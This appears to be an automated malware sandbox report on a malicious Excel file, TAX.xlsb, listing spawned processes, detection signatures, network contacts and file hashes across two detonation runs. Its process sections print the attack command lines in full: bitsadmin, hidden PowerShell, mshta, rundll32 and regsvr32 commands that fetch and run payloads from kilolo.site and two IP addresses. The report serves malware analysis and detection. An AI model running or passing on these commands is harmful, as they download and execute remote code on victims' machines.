PID 1244 wrote to memory of 764 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 764 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 764 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 1852 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 1852 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 1852 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 1852 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\cmd.exe
PID 1244 wrote to memory of 1340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1340 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1876 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1876 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1876 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1876 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1244 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mshta.exe
PID 1244 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mshta.exe
PID 1244 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mshta.exe
PID 1244 wrote to memory of 1728 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\mshta.exe
PID 764 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 764 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 764 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 764 wrote to memory of 1744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 576 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 576 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 576 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 576 wrote to memory of 1624 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 580 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 580 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 580 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 580 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 340 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 340 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 340 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 340 wrote to memory of 616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 676 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 676 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 676 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 676 wrote to memory of 688 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 1852 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1852 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1852 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1852 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TAX.xlsb

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c cd c:\&&mkdir Intel

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&regsvr3

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))

C:\Windows\SysWOW64\mshta.exe

mshta http://37.72.175.188:80/home

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll

C:\Windows\SysWOW64\timeout.exe

timeout /t 15

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj

Network

Country Destination Domain Proto
US 8.8.8.8:53 kilolo.site udp
US 37.72.175.188:80 tcp
US 37.72.175.188:443 tcp
US 37.72.175.188:80 tcp
US 37.72.175.188:443 tcp

Files

memory/1244-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 13fe200b2a43d97df088b631ac85489c
SHA1 efda47e0cb22ce1c706bc576006340b584842acb
SHA256 3f27a3f86e37776d4461e0a81a57f90a35742b089912a4c2cf25ea9a0db2db43
SHA512 d1e2b7f273ec490d6de20d1f410967c9e1216a9092def3e1edcfa993da74563864b92b4ac924f821d02dbd73e76f5150164b7b06c638af0b96624ae0915ec051

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8332NI830XOJXE26HA5V.temp

MD5 13fe200b2a43d97df088b631ac85489c
SHA1 efda47e0cb22ce1c706bc576006340b584842acb
SHA256 3f27a3f86e37776d4461e0a81a57f90a35742b089912a4c2cf25ea9a0db2db43
SHA512 d1e2b7f273ec490d6de20d1f410967c9e1216a9092def3e1edcfa993da74563864b92b4ac924f821d02dbd73e76f5150164b7b06c638af0b96624ae0915ec051

memory/1876-62-0x00000000024A0000-0x00000000024E0000-memory.dmp

memory/1340-63-0x00000000022E0000-0x0000000002320000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-04-03 00:30

Reported

2023-04-03 00:33

Platform

win10v2004-20230220-en

Max time kernel

105s

Max time network

108s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX.xlsb"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SYSTEM32\regsvr32.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A
N/A N/A C:\Windows\system32\bitsadmin.exe N/A
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4260 wrote to memory of 1764 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1764 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4676 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1952 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1952 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1612 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1612 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1904 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 1904 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4916 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4916 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4964 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4964 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\cmd.exe
PID 4260 wrote to memory of 4420 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4420 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1964 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1964 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4000 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\mshta.exe
PID 4260 wrote to memory of 4000 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\mshta.exe
PID 1904 wrote to memory of 1528 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1904 wrote to memory of 1528 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1612 wrote to memory of 3504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1612 wrote to memory of 3504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4676 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4676 wrote to memory of 1396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4260 wrote to memory of 2652 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\regsvr32.exe
PID 4260 wrote to memory of 2652 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\SYSTEM32\regsvr32.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX.xlsb"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c cd c:\&&mkdir Intel

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))

C:\Windows\SYSTEM32\mshta.exe

mshta http://37.72.175.188:80/home

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&regsvr3

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat

C:\Windows\SYSTEM32\regsvr32.exe

regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 141.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 73.254.224.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 37.72.175.188:80 tcp
US 37.72.175.188:443 tcp
US 8.8.8.8:53 kilolo.site udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
US 8.8.8.8:53 120.150.79.40.in-addr.arpa udp
US 8.8.8.8:53 kilolo.site udp
US 8.8.8.8:53 76.38.195.152.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
IE 20.50.80.209:443 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 93.184.221.240:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
NL 87.248.202.1:80 tcp

Files

memory/4260-133-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-134-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-135-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-136-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-137-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-138-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmp

memory/4260-139-0x00007FFAB4000000-0x00007FFAB4010000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 13a6db759b138f1510229709d38231f1
SHA1 4e6204c56c133c78362c12d6969a50a77c5abfc8
SHA256 575d8625af53ee28b9ab26b1882e5bb668f07f4aec7ae05cd1e22124208ea3b7
SHA512 f5955097bd9fb2ad71a8626b6fee491e94f54b31c70a1c097be39d8c9648aae050593344ec50a62e0e3e857896a5caf115a6e5dfefb99d499e0ede05195d284a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 00fed8dd4996964149c74d7cb47fb8d3
SHA1 eb96268a1da01a24b36a4fccb62195529f509283
SHA256 161a3bde696294af73b06de3960654d19608480d9056a7ba1dbdaa99a9a3e20a
SHA512 a306dffdf7f1ef5077fb087a6aa7e83c4382207cdc191bf54af6b80e6c3b7e07b9ff1d894155bb7193ad3cdcf26d75b06965aa96fc501b77b4174b3c5339ee05

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1yrygnr.ult.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4420-170-0x000001DB97640000-0x000001DB97662000-memory.dmp

memory/4420-175-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

memory/4420-176-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

memory/1964-177-0x0000028226340000-0x0000028226350000-memory.dmp

memory/1964-178-0x0000028226340000-0x0000028226350000-memory.dmp

memory/4420-179-0x000001DBAFD70000-0x000001DBAFD80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 49e7d5f2a296b59afec08bc314bed998
SHA1 7f898bf195ffd46ce2d19fad0ce33155f6e47f5f
SHA256 394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe
SHA512 f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

memory/4260-196-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-197-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-198-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp

memory/4260-199-0x00007FFAB6490000-0x00007FFAB64A0000-memory.dmp